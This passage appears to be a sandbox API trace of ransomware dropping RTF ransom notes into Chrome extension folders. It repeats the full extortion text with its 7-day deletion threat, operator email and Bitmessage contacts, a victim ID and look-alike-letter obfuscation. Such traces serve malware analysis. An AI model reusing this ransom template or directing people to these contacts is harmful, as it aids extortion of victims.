\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.195] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.196] CloseHandle (hObject=0x2ec) returned 1 [0291.196] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\#readme_eman#.rtf")) returned 0xffffffff [0291.196] GetLastError () returned 0x2 [0291.196] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.197] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 